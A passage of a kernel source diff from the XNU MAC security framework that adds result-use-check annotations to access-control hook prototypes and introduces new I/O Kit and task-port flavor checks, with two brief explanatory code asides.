-int     mac_proc_check_inherit_ipc_ports(struct proc *p, struct vnode *cur_vp, off_t cur_offset, struct vnode *img_vp, off_t img_offset, struct vnode *scriptvp);
-int     mac_proc_check_getaudit(proc_t proc);
-int     mac_proc_check_getauid(proc_t proc);
+int     mac_priv_check(kauth_cred_t cred, int priv) __result_use_check;
+int     mac_priv_grant(kauth_cred_t cred, int priv) __result_use_check;
+int     mac_proc_check_debug(proc_ident_t tracing_ident, kauth_cred_t tracing_cred, proc_ident_t traced_ident) __result_use_check;
+int     mac_proc_check_dump_core(proc_t proc) __result_use_check;
+int     mac_proc_check_proc_info(proc_t curp, proc_t target, int callnum, int flavor) __result_use_check;
+int     mac_proc_check_get_cs_info(proc_t curp, proc_t target, unsigned int op) __result_use_check;
+int     mac_proc_check_set_cs_info(proc_t curp, proc_t target, unsigned int op) __result_use_check;
+int     mac_proc_check_fork(proc_t proc) __result_use_check;
+int     mac_proc_check_suspend_resume(proc_t proc, int sr) __result_use_check;
+int     mac_proc_check_get_task(kauth_cred_t cred, proc_ident_t pident, mach_task_flavor_t flavor) __result_use_check;
+int     mac_proc_check_expose_task(kauth_cred_t cred, proc_ident_t pident, mach_task_flavor_t flavor) __result_use_check;
+int     mac_proc_check_get_movable_control_port(void) __result_use_check;
+int     mac_proc_check_inherit_ipc_ports(struct proc *p, struct vnode *cur_vp, off_t cur_offset, struct vnode *img_vp, off_t img_offset, struct vnode *scriptvp) __result_use_check;
+int     mac_proc_check_getaudit(proc_t proc) __result_use_check;
+int     mac_proc_check_getauid(proc_t proc) __result_use_check;
 int     mac_proc_check_getlcid(proc_t proc1, proc_t proc2,
-    pid_t pid);
-int     mac_proc_check_ledger(proc_t curp, proc_t target, int op);
+    pid_t pid) __result_use_check;
+int     mac_proc_check_dyld_process_info_notify_register(void) __result_use_check;
+int     mac_proc_check_ledger(proc_t curp, proc_t target, int op) __result_use_check;
 int     mac_proc_check_map_anon(proc_t proc, user_addr_t u_addr,
-    user_size_t u_size, int prot, int flags, int *maxprot);
+    user_size_t u_size, int prot, int flags, int *maxprot) __result_use_check;
 int     mac_proc_check_mprotect(proc_t proc,
-    user_addr_t addr, user_size_t size, int prot);
-int     mac_proc_check_run_cs_invalid(proc_t proc);
+    user_addr_t addr, user_size_t size, int prot) __result_use_check;
+int     mac_proc_check_run_cs_invalid(proc_t proc) __result_use_check;
 void    mac_proc_notify_cs_invalidated(proc_t proc);
-int     mac_proc_check_sched(proc_t proc, proc_t proc2);
-int     mac_proc_check_setaudit(proc_t proc, struct auditinfo_addr *ai);
-int     mac_proc_check_setauid(proc_t proc, uid_t auid);
+int     mac_proc_check_sched(proc_t proc, proc_t proc2) __result_use_check;
+int     mac_proc_check_setaudit(proc_t proc, struct auditinfo_addr *ai) __result_use_check;
+int     mac_proc_check_setauid(proc_t proc, uid_t auid) __result_use_check;
 int     mac_proc_check_setlcid(proc_t proc1, proc_t proc2,
-    pid_t pid1, pid_t pid2);
+    pid_t pid1, pid_t pid2) __result_use_check;
 int     mac_proc_check_signal(proc_t proc1, proc_t proc2,
-    int signum);
-int     mac_proc_check_syscall_unix(proc_t proc, int scnum);
-int     mac_proc_check_wait(proc_t proc1, proc_t proc2);
+    int signum) __result_use_check;
+int     mac_proc_check_syscall_unix(proc_t proc, int scnum) __result_use_check;
+int     mac_proc_check_wait(proc_t proc1, proc_t proc2) __result_use_check;
 void    mac_proc_notify_exit(proc_t proc);
-int     mac_socket_check_accept(kauth_cred_t cred, struct socket *so);
-int     mac_socket_check_accepted(kauth_cred_t cred, struct socket *so);
+int     mac_socket_check_accept(kauth_cred_t cred, struct socket *so) __result_use_check;
+int     mac_socket_check_accepted(kauth_cred_t cred, struct socket *so) __result_use_check;
 int     mac_socket_check_bind(kauth_cred_t cred, struct socket *so,
-    struct sockaddr *addr);
+    struct sockaddr *addr) __result_use_check;
 int     mac_socket_check_connect(kauth_cred_t cred, struct socket *so,
-    struct sockaddr *addr);
+    struct sockaddr *addr) __result_use_check;
 int     mac_socket_check_create(kauth_cred_t cred, int domain,
-    int type, int protocol);
+    int type, int protocol) __result_use_check;
 int     mac_socket_check_ioctl(kauth_cred_t cred, struct socket *so,
-    unsigned long cmd);
-int     mac_socket_check_listen(kauth_cred_t cred, struct socket *so);
-int     mac_socket_check_receive(kauth_cred_t cred, struct socket *so);
+    unsigned long cmd) __result_use_check;
+int     mac_socket_check_listen(kauth_cred_t cred, struct socket *so) __result_use_check;
+int     mac_socket_check_receive(kauth_cred_t cred, struct socket *so) __result_use_check;
 int     mac_socket_check_received(kauth_cred_t cred, struct socket *so,
-    struct sockaddr *saddr);
+    struct sockaddr *saddr) __result_use_check;
 int     mac_socket_check_send(kauth_cred_t cred, struct socket *so,
-    struct sockaddr *addr);
+    struct sockaddr *addr) __result_use_check;
 int     mac_socket_check_getsockopt(kauth_cred_t cred, struct socket *so,
-    struct sockopt *sopt);
+    struct sockopt *sopt) __result_use_check;
 int     mac_socket_check_setsockopt(kauth_cred_t cred, struct socket *so,
-    struct sockopt *sopt);
-int     mac_socket_check_stat(kauth_cred_t cred, struct socket *so);
+    struct sockopt *sopt) __result_use_check;
+int     mac_socket_check_stat(kauth_cred_t cred, struct socket *so) __result_use_check;
 void    mac_socket_label_associate(kauth_cred_t cred, struct socket *so);
 void    mac_socket_label_associate_accept(struct socket *oldsocket,
     struct socket *newsocket);
 void    mac_socket_label_copy(struct label *from, struct label *to);
 void    mac_socket_label_destroy(struct socket *);
 int     mac_socket_label_get(kauth_cred_t cred, struct socket *so,
-    struct mac *extmac);
-int     mac_socket_label_init(struct socket *, int waitok);
+    struct mac *extmac) __result_use_check;
+int     mac_socket_label_init(struct socket *, int waitok) __result_use_check;
 void    mac_socketpeer_label_associate_socket(struct socket *peersocket,
     struct socket *socket_to_modify);
 int     mac_socketpeer_label_get(kauth_cred_t cred, struct socket *so,
-    struct mac *extmac);
-int     mac_system_check_acct(kauth_cred_t cred, struct vnode *vp);
-int     mac_system_check_audit(kauth_cred_t cred, void *record, int length);
-int     mac_system_check_auditctl(kauth_cred_t cred, struct vnode *vp);
-int     mac_system_check_auditon(kauth_cred_t cred, int cmd);
-int     mac_system_check_host_priv(kauth_cred_t cred);
-int     mac_system_check_info(kauth_cred_t, const char *info_type);
-int     mac_system_check_nfsd(kauth_cred_t cred);
-int     mac_system_check_reboot(kauth_cred_t cred, int howto);
-int     mac_system_check_settime(kauth_cred_t cred);
-int     mac_system_check_swapoff(kauth_cred_t cred, struct vnode *vp);
-int     mac_system_check_swapon(kauth_cred_t cred, struct vnode *vp);
+    struct mac *extmac) __result_use_check;
+int     mac_system_check_acct(kauth_cred_t cred, struct vnode *vp) __result_use_check;
+int     mac_system_check_audit(kauth_cred_t cred, void *record, int length) __result_use_check;
+int     mac_system_check_auditctl(kauth_cred_t cred, struct vnode *vp) __result_use_check;
+int     mac_system_check_auditon(kauth_cred_t cred, int cmd) __result_use_check;
+int     mac_system_check_host_priv(kauth_cred_t cred) __result_use_check;
+int     mac_system_check_info(kauth_cred_t, const char *info_type) __result_use_check;
+int     mac_system_check_nfsd(kauth_cred_t cred) __result_use_check;
+int     mac_system_check_reboot(kauth_cred_t cred, int howto) __result_use_check;
+int     mac_system_check_settime(kauth_cred_t cred) __result_use_check;
+int     mac_system_check_swapoff(kauth_cred_t cred, struct vnode *vp) __result_use_check;
+int     mac_system_check_swapon(kauth_cred_t cred, struct vnode *vp) __result_use_check;
 int     mac_system_check_sysctlbyname(kauth_cred_t cred, const char *namestring, int *name,
     size_t namelen, user_addr_t oldctl, size_t oldlen,
-    user_addr_t newctl, size_t newlen);
-int     mac_system_check_kas_info(kauth_cred_t cred, int selector);
+    user_addr_t newctl, size_t newlen) __result_use_check;
+int     mac_system_check_kas_info(kauth_cred_t cred, int selector) __result_use_check;
 void    mac_sysvmsg_label_associate(kauth_cred_t cred,
     struct msqid_kernel *msqptr, struct msg *msgptr);
 void    mac_sysvmsg_label_init(struct msg *msgptr);
 void    mac_sysvmsg_label_recycle(struct msg *msgptr);
 int     mac_sysvmsq_check_enqueue(kauth_cred_t cred, struct msg *msgptr,
-    struct msqid_kernel *msqptr);
-int     mac_sysvmsq_check_msgrcv(kauth_cred_t cred, struct msg *msgptr);
-int     mac_sysvmsq_check_msgrmid(kauth_cred_t cred, struct msg *msgptr);
+    struct msqid_kernel *msqptr) __result_use_check;
+int     mac_sysvmsq_check_msgrcv(kauth_cred_t cred, struct msg *msgptr) __result_use_check;
+int     mac_sysvmsq_check_msgrmid(kauth_cred_t cred, struct msg *msgptr) __result_use_check;
 int     mac_sysvmsq_check_msqctl(kauth_cred_t cred,
-    struct msqid_kernel *msqptr, int cmd);
+    struct msqid_kernel *msqptr, int cmd) __result_use_check;
 int     mac_sysvmsq_check_msqget(kauth_cred_t cred,
-    struct msqid_kernel *msqptr);
+    struct msqid_kernel *msqptr) __result_use_check;
 int     mac_sysvmsq_check_msqrcv(kauth_cred_t cred,
-    struct msqid_kernel *msqptr);
+    struct msqid_kernel *msqptr) __result_use_check;
 int     mac_sysvmsq_check_msqsnd(kauth_cred_t cred,
-    struct msqid_kernel *msqptr);
+    struct msqid_kernel *msqptr) __result_use_check;
 void    mac_sysvmsq_label_associate(kauth_cred_t cred,
     struct msqid_kernel *msqptr);
 void    mac_sysvmsq_label_init(struct msqid_kernel *msqptr);
 void    mac_sysvmsq_label_recycle(struct msqid_kernel *msqptr);
 int     mac_sysvsem_check_semctl(kauth_cred_t cred,
-    struct semid_kernel *semakptr, int cmd);
+    struct semid_kernel *semakptr, int cmd) __result_use_check;
 int     mac_sysvsem_check_semget(kauth_cred_t cred,
-    struct semid_kernel *semakptr);
+    struct semid_kernel *semakptr) __result_use_check;
 int     mac_sysvsem_check_semop(kauth_cred_t cred,
-    struct semid_kernel *semakptr, size_t accesstype);
+    struct semid_kernel *semakptr, size_t accesstype) __result_use_check;
 void    mac_sysvsem_label_associate(kauth_cred_t cred,
     struct semid_kernel *semakptr);
 void    mac_sysvsem_label_destroy(struct semid_kernel *semakptr);
 void    mac_sysvsem_label_init(struct semid_kernel *semakptr);
 void    mac_sysvsem_label_recycle(struct semid_kernel *semakptr);
 int     mac_sysvshm_check_shmat(kauth_cred_t cred,
-    struct shmid_kernel *shmsegptr, int shmflg);
+    struct shmid_kernel *shmsegptr, int shmflg) __result_use_check;
 int     mac_sysvshm_check_shmctl(kauth_cred_t cred,
-    struct shmid_kernel *shmsegptr, int cmd);
+    struct shmid_kernel *shmsegptr, int cmd) __result_use_check;
 int     mac_sysvshm_check_shmdt(kauth_cred_t cred,
-    struct shmid_kernel *shmsegptr);
+    struct shmid_kernel *shmsegptr) __result_use_check;
 int     mac_sysvshm_check_shmget(kauth_cred_t cred,
-    struct shmid_kernel *shmsegptr, int shmflg);
+    struct shmid_kernel *shmsegptr, int shmflg) __result_use_check;
 void    mac_sysvshm_label_associate(kauth_cred_t cred,
     struct shmid_kernel *shmsegptr);
 void    mac_sysvshm_label_destroy(struct shmid_kernel *shmsegptr);
 void    mac_sysvshm_label_init(struct shmid_kernel* shmsegptr);
 void    mac_sysvshm_label_recycle(struct shmid_kernel *shmsegptr);
 int     mac_vnode_check_access(vfs_context_t ctx, struct vnode *vp,
-    int acc_mode);
-int     mac_vnode_check_chdir(vfs_context_t ctx, struct vnode *dvp);
+    int acc_mode) __result_use_check;
+int     mac_vnode_check_chdir(vfs_context_t ctx, struct vnode *dvp) __result_use_check;
 int     mac_vnode_check_chroot(vfs_context_t ctx, struct vnode *dvp,
-    struct componentname *cnp);
+    struct componentname *cnp) __result_use_check;
 int     mac_vnode_check_clone(vfs_context_t ctx, struct vnode *dvp,
-    struct vnode *vp, struct componentname *cnp);
+    struct vnode *vp, struct componentname *cnp) __result_use_check;
 int     mac_vnode_check_create(vfs_context_t ctx, struct vnode *dvp,
-    struct componentname *cnp, struct vnode_attr *vap);
+    struct componentname *cnp, struct vnode_attr *vap) __result_use_check;
 int     mac_vnode_check_deleteextattr(vfs_context_t ctx, struct vnode *vp,
-    const char *name);
+    const char *name) __result_use_check;
 int     mac_vnode_check_exchangedata(vfs_context_t ctx, struct vnode *v1,
-    struct vnode *v2);
+    struct vnode *v2) __result_use_check;
 int     mac_vnode_check_exec(vfs_context_t ctx, struct vnode *vp,
-    struct image_params *imgp);
-int     mac_vnode_check_fsgetpath(vfs_context_t ctx, struct vnode *vp);
+    struct image_params *imgp) __result_use_check;
+int     mac_vnode_check_fsgetpath(vfs_context_t ctx, struct vnode *vp) __result_use_check;
 int     mac_vnode_check_getattr(vfs_context_t ctx, struct ucred *file_cred,
-    struct vnode *vp, struct vnode_attr *va);
+    struct vnode *vp, struct vnode_attr *va) __result_use_check;
 int     mac_vnode_check_getattrlist(vfs_context_t ctx, struct vnode *vp,
-    struct attrlist *alist);
+    struct attrlist *alist) __result_use_check;
 int     mac_vnode_check_getextattr(vfs_context_t ctx, struct vnode *vp,
-    const char *name, struct uio *uio);
+    const char *name, struct uio *uio) __result_use_check;
 int     mac_vnode_check_ioctl(vfs_context_t ctx, struct vnode *vp,
-    unsigned long cmd);
+    unsigned long cmd) __result_use_check;
 int     mac_vnode_check_kqfilter(vfs_context_t ctx,
-    kauth_cred_t file_cred, struct knote *kn, struct vnode *vp);
+    kauth_cred_t file_cred, struct knote *kn, struct vnode *vp) __result_use_check;
 int     mac_vnode_check_label_update(vfs_context_t ctx, struct vnode *vp,
-    struct label *newlabel);
+    struct label *newlabel) __result_use_check;
 int     mac_vnode_check_link(vfs_context_t ctx, struct vnode *dvp,
-    struct vnode *vp, struct componentname *cnp);
-int     mac_vnode_check_listextattr(vfs_context_t ctx, struct vnode *vp);
+    struct vnode *vp, struct componentname *cnp) __result_use_check;
+int     mac_vnode_check_listextattr(vfs_context_t ctx, struct vnode *vp) __result_use_check;
 int     mac_vnode_check_lookup(vfs_context_t ctx, struct vnode *dvp,
-    struct componentname *cnp);
+    struct componentname *cnp) __result_use_check;
 int     mac_vnode_check_lookup_preflight(vfs_context_t ctx, struct vnode *dvp,
-    const char *path, size_t pathlen);
+    const char *path, size_t pathlen) __result_use_check;
 int     mac_vnode_check_open(vfs_context_t ctx, struct vnode *vp,
-    int acc_mode);
+    int acc_mode) __result_use_check;
 int     mac_vnode_check_read(vfs_context_t ctx,
-    kauth_cred_t file_cred, struct vnode *vp);
-int     mac_vnode_check_readdir(vfs_context_t ctx, struct vnode *vp);
-int     mac_vnode_check_readlink(vfs_context_t ctx, struct vnode *vp);
+    kauth_cred_t file_cred, struct vnode *vp) __result_use_check;
+int     mac_vnode_check_readdir(vfs_context_t ctx, struct vnode *vp) __result_use_check;
+int     mac_vnode_check_readlink(vfs_context_t ctx, struct vnode *vp) __result_use_check;
 int     mac_vnode_check_rename(vfs_context_t ctx, struct vnode *dvp,
     struct vnode *vp, struct componentname *cnp, struct vnode *tdvp,
-    struct vnode *tvp, struct componentname *tcnp);
-int     mac_vnode_check_revoke(vfs_context_t ctx, struct vnode *vp);
+    struct vnode *tvp, struct componentname *tcnp) __result_use_check;
+int     mac_vnode_check_revoke(vfs_context_t ctx, struct vnode *vp) __result_use_check;
 int     mac_vnode_check_searchfs(vfs_context_t ctx, struct vnode *vp,
-    struct attrlist *alist);
+    struct attrlist *alist) __result_use_check;
 int     mac_vnode_check_select(vfs_context_t ctx, struct vnode *vp,
-    int which);
+    int which) __result_use_check;
 int     mac_vnode_check_setacl(vfs_context_t ctx, struct vnode *vp,
-    struct kauth_acl *acl);
+    struct kauth_acl *acl) __result_use_check;
 int     mac_vnode_check_setattrlist(vfs_context_t ctxd, struct vnode *vp,
-    struct attrlist *alist);
+    struct attrlist *alist) __result_use_check;
 int     mac_vnode_check_setextattr(vfs_context_t ctx, struct vnode *vp,
-    const char *name, struct uio *uio);
+    const char *name, struct uio *uio) __result_use_check;
 int     mac_vnode_check_setflags(vfs_context_t ctx, struct vnode *vp,
-    u_long flags);
+    u_long flags) __result_use_check;
 int     mac_vnode_check_setmode(vfs_context_t ctx, struct vnode *vp,
-    mode_t mode);
+    mode_t mode) __result_use_check;
 int     mac_vnode_check_setowner(vfs_context_t ctx, struct vnode *vp,
-    uid_t uid, gid_t gid);
+    uid_t uid, gid_t gid) __result_use_check;
 int     mac_vnode_check_setutimes(vfs_context_t ctx, struct vnode *vp,
-    struct timespec atime, struct timespec mtime);
+    struct timespec atime, struct timespec mtime) __result_use_check;
 int     mac_vnode_check_signature(struct vnode *vp,
     struct cs_blob *cs_blob, struct image_params *imgp,
     unsigned int *cs_flags, unsigned int *signer_type,
-    int flags, unsigned int platform);
+    int flags, unsigned int platform) __result_use_check;
 int     mac_vnode_check_supplemental_signature(struct vnode *vp,
     struct cs_blob *cs_blob, struct vnode *linked_vp,
-    struct cs_blob *linked_cs_blob, unsigned int *signer_type);
+    struct cs_blob *linked_cs_blob, unsigned int *signer_type) __result_use_check;
 int     mac_vnode_check_stat(vfs_context_t ctx,
-    kauth_cred_t file_cred, struct vnode *vp);
+    kauth_cred_t file_cred, struct vnode *vp) __result_use_check;
 #ifdef KERNEL_PRIVATE
 int     mac_vnode_check_trigger_resolve(vfs_context_t ctx, struct vnode *dvp,
-    struct componentname *cnp);
+    struct componentname *cnp) __result_use_check;
 #endif
 int     mac_vnode_check_truncate(vfs_context_t ctx,
-    kauth_cred_t file_cred, struct vnode *vp);
+    kauth_cred_t file_cred, struct vnode *vp) __result_use_check;
 int     mac_vnode_check_uipc_bind(vfs_context_t ctx, struct vnode *dvp,
-    struct componentname *cnp, struct vnode_attr *vap);
-int     mac_vnode_check_uipc_connect(vfs_context_t ctx, struct vnode *vp, struct socket *so);
+    struct componentname *cnp, struct vnode_attr *vap) __result_use_check;
+int     mac_vnode_check_uipc_connect(vfs_context_t ctx, struct vnode *vp, struct socket *so) __result_use_check;
 int     mac_vnode_check_unlink(vfs_context_t ctx, struct vnode *dvp,
-    struct vnode *vp, struct componentname *cnp);
+    struct vnode *vp, struct componentname *cnp) __result_use_check;
 int     mac_vnode_check_write(vfs_context_t ctx,
-    kauth_cred_t file_cred, struct vnode *vp);
+    kauth_cred_t file_cred, struct vnode *vp) __result_use_check;
 struct label    *mac_vnode_label_alloc(void);
 int     mac_vnode_label_associate(struct mount *mp, struct vnode *vp,
-    vfs_context_t ctx);
+    vfs_context_t ctx) __result_use_check;
 void    mac_vnode_label_associate_devfs(struct mount *mp, struct devnode *de,
     struct vnode *vp);
-int     mac_vnode_label_associate_extattr(struct mount *mp, struct vnode *vp);
+int     mac_vnode_label_associate_extattr(struct mount *mp, struct vnode *vp) __result_use_check;
 int     mac_vnode_label_associate_fdesc(struct mount *mp, struct fdescnode *fnp,
-    struct vnode *vp, vfs_context_t ctx);
+    struct vnode *vp, vfs_context_t ctx) __result_use_check;
 void    mac_vnode_label_associate_singlelabel(struct mount *mp,
     struct vnode *vp);
 void    mac_vnode_label_copy(struct label *l1, struct label *l2);
 void    mac_vnode_label_destroy(struct vnode *vp);
-int     mac_vnode_label_externalize_audit(struct vnode *vp, struct mac *mac);
+int     mac_vnode_label_externalize_audit(struct vnode *vp, struct mac *mac) __result_use_check;
 void    mac_vnode_label_free(struct label *label);
 void    mac_vnode_label_init(struct vnode *vp);
-int     mac_vnode_label_init_needed(struct vnode *vp);
+int     mac_vnode_label_init_needed(struct vnode *vp) __result_use_check;
 #ifdef KERNEL_PRIVATE
 struct label *mac_vnode_label_allocate(vnode_t vp);
 #endif
@@ -524,7 +528,7 @@ void    mac_vnode_label_update(vfs_context_t ctx, struct vnode *vp,
 void    mac_vnode_label_update_extattr(struct mount *mp, struct vnode *vp,
     const char *name);
 int     mac_vnode_notify_create(vfs_context_t ctx, struct mount *mp,
-    struct vnode *dvp, struct vnode *vp, struct componentname *cnp);
+    struct vnode *dvp, struct vnode *vp, struct componentname *cnp) __result_use_check;
 void    mac_vnode_notify_deleteextattr(vfs_context_t ctx, struct vnode *vp, const char *name);
 void    mac_vnode_notify_link(vfs_context_t ctx, struct vnode *vp,
     struct vnode *dvp, struct componentname *cnp);
@@ -539,17 +543,17 @@ void    mac_vnode_notify_setmode(vfs_context_t ctx, struct vnode *vp, mode_t mod
 void    mac_vnode_notify_setowner(vfs_context_t ctx, struct vnode *vp, uid_t uid, gid_t gid);
 void    mac_vnode_notify_setutimes(vfs_context_t ctx, struct vnode *vp, struct timespec atime, struct timespec mtime);
 void    mac_vnode_notify_truncate(vfs_context_t ctx, kauth_cred_t file_cred, struct vnode *vp);
-int     mac_vnode_find_sigs(struct proc *p, struct vnode *vp, off_t offsetInMacho);
+int     mac_vnode_find_sigs(struct proc *p, struct vnode *vp, off_t offsetInMacho) __result_use_check;
 int     vnode_label(struct mount *mp, struct vnode *dvp, struct vnode *vp,
-    struct componentname *cnp, int flags, vfs_context_t ctx);
+    struct componentname *cnp, int flags, vfs_context_t ctx) __result_use_check;
 void    vnode_relabel(struct vnode *vp);
 void    mac_pty_notify_grant(proc_t p, struct tty *tp, dev_t dev, struct label *label);
 void    mac_pty_notify_close(proc_t p, struct tty *tp, dev_t dev, struct label *label);
-int     mac_kext_check_load(kauth_cred_t cred, const char *identifier);
-int     mac_kext_check_unload(kauth_cred_t cred, const char *identifier);
-int     mac_kext_check_query(kauth_cred_t cred);
-int     mac_skywalk_flow_check_connect(proc_t p, void *flow, const struct sockaddr *addr, int type, int protocol);
-int     mac_skywalk_flow_check_listen(proc_t p, void *flow, const struct sockaddr *addr, int type, int protocol);
+int     mac_kext_check_load(kauth_cred_t cred, const char *identifier) __result_use_check;
+int     mac_kext_check_unload(kauth_cred_t cred, const char *identifier) __result_use_check;
+int     mac_kext_check_query(kauth_cred_t cred) __result_use_check;
+int     mac_skywalk_flow_check_connect(proc_t p, void *flow, const struct sockaddr *addr, int type, int protocol) __result_use_check;
+int     mac_skywalk_flow_check_listen(proc_t p, void *flow, const struct sockaddr *addr, int type, int protocol) __result_use_check;
 void    mac_vnode_notify_reclaim(vnode_t vp);
 
 void psem_label_associate(struct fileproc *fp, struct vnode *vp, struct vfs_context *ctx);
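
A hedged aside on what the blanket __result_use_check annotation above buys callers: under the usual assumption that it expands to __attribute__((__warn_unused_result__)) (as in <sys/cdefs.h>), dropping the return value of any annotated MAC check now draws a compiler diagnostic. mac_example_check and example_caller below are hypothetical, purely illustrative names:

#include <sys/cdefs.h>

int mac_example_check(int arg) __result_use_check;

static int
example_caller(void)
{
        int error = mac_example_check(0);   /* result consumed: no diagnostic */

        if (error != 0) {
                return error;
        }
        mac_example_check(1);               /* result dropped: -Wunused-result */
        return 0;
}
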
index fe1f43ac0896b0472b98b04b3bc08465c62ebd95..a6946e80b9681efdbbbd00e5227da24c133ca1ef 100644 (file)
 #include <security/mac_framework.h>
 #include <security/mac_internal.h>
 
+int
+mac_iokit_check_open_service(kauth_cred_t cred, io_object_t service, unsigned int user_client_type)
+{
+       int error;
+
+       MAC_CHECK(iokit_check_open_service, cred, service, user_client_type);
+       return error;
+}
+
 int
 mac_iokit_check_open(kauth_cred_t cred, io_object_t user_client, unsigned int user_client_type)
 {
index 4739336fb1dfbb566596b4c30a39d489b7779d81..a1bb852f37fbb897e26b4a63a71d827c552eeb6e 100644 (file)
@@ -75,10 +75,12 @@ mac_task_get_proc(struct task *task)
 }
 
 int
-mac_task_check_expose_task(struct task *task)
+mac_task_check_expose_task(struct task *task, mach_task_flavor_t flavor)
 {
        int error;
 
+       assert(flavor <= TASK_FLAVOR_NAME);
+
        struct proc *p = mac_task_get_proc(task);
        if (p == NULL) {
                return ESRCH;
@@ -87,7 +89,51 @@ mac_task_check_expose_task(struct task *task)
 
        struct ucred *cred = kauth_cred_get();
        proc_rele(p);
-       MAC_CHECK(proc_check_expose_task, cred, &pident);
+
+       /* Also call the old hook for compatibility, deprecating in rdar://66356944. */
+       if (flavor == TASK_FLAVOR_CONTROL) {
+               MAC_CHECK(proc_check_expose_task, cred, &pident);
+               if (error) {
+                       return error;
+               }
+       }
+
+       MAC_CHECK(proc_check_expose_task_with_flavor, cred, &pident, flavor);
+
+       return error;
+}
+
+int
+mac_task_check_task_id_token_get_task(struct task *task, mach_task_flavor_t flavor)
+{
+       int error;
+
+       assert(flavor <= TASK_FLAVOR_NAME);
+
+       struct proc *p = mac_task_get_proc(task);
+       if (p == NULL) {
+               return ESRCH;
+       }
+       struct proc_ident pident = proc_ident(p);
+
+       proc_rele(p);
+
+       p = current_proc();
+       kauth_cred_t cred = kauth_cred_proc_ref(p);
+       MAC_CHECK(proc_check_task_id_token_get_task, cred, &pident, flavor);
+       kauth_cred_unref(&cred);
+       return error;
+}
+
+int
+mac_task_check_get_movable_control_port(void)
+{
+       int error;
+       struct proc *p = current_proc();
+
+       kauth_cred_t cred = kauth_cred_proc_ref(p);
+       MAC_CHECK(proc_check_get_movable_control_port, cred);
+       kauth_cred_unref(&cred);
        return error;
 }
 
@@ -125,6 +171,18 @@ mac_task_check_set_host_exception_port(struct task *task, unsigned int exception
        return error;
 }
 
+int
+mac_task_check_dyld_process_info_notify_register(void)
+{
+       int error;
+       struct proc *p = current_proc();
+
+       kauth_cred_t cred = kauth_cred_proc_ref(p);
+       MAC_CHECK(proc_check_dyld_process_info_notify_register, cred);
+       kauth_cred_unref(&cred);
+       return error;
+}
+
 int
 mac_task_check_set_host_exception_ports(struct task *task, unsigned int exception_mask)
 {
index 3e716ebd607c9755bda6840dfccd0a493c950782..ba59e1b843f3003a5fb0f020316bf5f6227d4266 100644 (file)
@@ -74,14 +74,16 @@ void mac_policy_init(void);
 void mac_policy_initmach(void);
 
 /* tasks */
-int    mac_task_check_expose_task(struct task *t);
-
+int    mac_task_check_expose_task(struct task *t, mach_task_flavor_t flavor);
+int    mac_task_check_task_id_token_get_task(struct task *t, mach_task_flavor_t flavor);
 int    mac_task_check_set_host_special_port(struct task *task,
            int id, struct ipc_port *port);
 int    mac_task_check_set_host_exception_port(struct task *task,
            unsigned int exception);
 int    mac_task_check_set_host_exception_ports(struct task *task,
            unsigned int exception_mask);
+int mac_task_check_get_movable_control_port(void);
+int mac_task_check_dyld_process_info_notify_register(void);
 
 /* See rdar://problem/58989880 */
 #ifndef bitstr_test
@@ -92,7 +94,7 @@ typedef int (*mac_task_mach_filter_cbfunc_t)(struct proc *bsdinfo, int num);
 typedef int (*mac_task_kobj_filter_cbfunc_t)(struct proc *bsdinfo, int msgid, int index);
 extern mac_task_mach_filter_cbfunc_t mac_task_mach_trap_evaluate;
 extern mac_task_kobj_filter_cbfunc_t mac_task_kobj_msg_evaluate;
-extern int mach_trap_count;
+extern const int mach_trap_count;
 extern int mach_kobj_count;
 
 void mac_task_set_mach_filter_mask(struct task *task, uint8_t *maskptr);
index 08adb58fb393a36612ace96547c1a828dbafaf75..cd87e78623c7fce9a025849836668edfa12fe319 100644 (file)
@@ -1059,7 +1059,8 @@ typedef void mpo_file_label_init_t(
  *
  *  Determine whether the subject identified by the credential can open an
  *  I/O Kit device at the passed path of the passed user client class and
- *  type.
+ *  type.  This check is performed after instantiating the user client.
+ *  See also mpo_iokit_check_open_service_t.
  *
  *  @return Return 0 if access is granted, or an appropriate value for
  *  errno should be returned.
@@ -1069,6 +1070,25 @@ typedef int mpo_iokit_check_open_t(
        io_object_t user_client,
        unsigned int user_client_type
        );
+/**
+ *  @brief Access control check for opening an I/O Kit device
+ *  @param cred Subject credential
+ *  @param service Service instance
+ *  @param user_client_type User client type
+ *
+ *  Determine whether the subject identified by the credential can open an
+ *  I/O Kit user client of the passed service and user client type.
+ *  This check is performed before instantiating the user client.  See also
+ *  mpo_iokit_check_open_t.
+ *
+ *  @return Return 0 if access is granted, or an appropriate value for
+ *  errno should be returned.
+ */
+typedef int mpo_iokit_check_open_service_t(
+       kauth_cred_t cred,
+       io_object_t service,
+       unsigned int user_client_type
+       );
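
A hedged sketch of the intended ordering between the two I/O Kit hooks, as stated in the doc comments: mpo_iokit_check_open_service_t runs before the user client is instantiated, mpo_iokit_check_open_t after. example_open_user_client is hypothetical; only the two framework entry points and their signatures are taken from the header changes earlier in this diff:

static int
example_open_user_client(kauth_cred_t cred, io_object_t service,
    io_object_t client, unsigned int user_client_type)
{
        int error;

        /* New hook: checked against the service, before instantiation. */
        error = mac_iokit_check_open_service(cred, service, user_client_type);
        if (error != 0) {
                return error;
        }

        /*
         * In the real open path the user client is created between the two
         * checks; the existing hook then checks the instantiated client.
         */
        return mac_iokit_check_open(cred, client, user_client_type);
}
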
 /**
  *  @brief Access control check for setting I/O Kit device properties
  *  @param cred Subject credential
@@ -2152,6 +2172,27 @@ typedef int mpo_proc_check_set_host_exception_port_t(
        kauth_cred_t cred,
        unsigned int exception
        );
+/**
+ *  @brief Access control check for getting movable task/thread control port for current task.
+ *  @param cred Subject credential
+ *
+ *  @return Return 0 if access is granted, otherwise an appropriate value for
+ *  errno should be returned.
+ */
+typedef int mpo_proc_check_get_movable_control_port_t(
+       kauth_cred_t cred
+       );
+/**
+ *  @brief Access control check for calling task_dyld_process_info_notify_register
+ *  and task_dyld_process_info_notify_deregister.
+ *  @param cred Subject credential
+ *
+ *  @return Return 0 if access is granted, otherwise an appropriate value for
+ *  errno should be returned.
+ */
+typedef int mpo_proc_check_dyld_process_info_notify_register_t(
+       kauth_cred_t cred
+       );
 /**
  *  @brief Access control over pid_suspend, pid_resume and family
  *  @param cred Subject credential
@@ -3494,6 +3535,26 @@ typedef int mpo_proc_check_get_task_t(
        struct proc_ident *pident
        );
 
+/**
+ *  @brief Access control check for getting a process's task ports of different flavors
+ *  @param cred Subject credential
+ *  @param pident Object unique process identifier
+ *  @param flavor Requested task port flavor
+ *
+ *  Determine whether the subject identified by the credential can get
+ *  the passed process's task port of given flavor.
+ *  This call is used by the task_{,read,inspect,name}_for_pid(2) API.
+ *
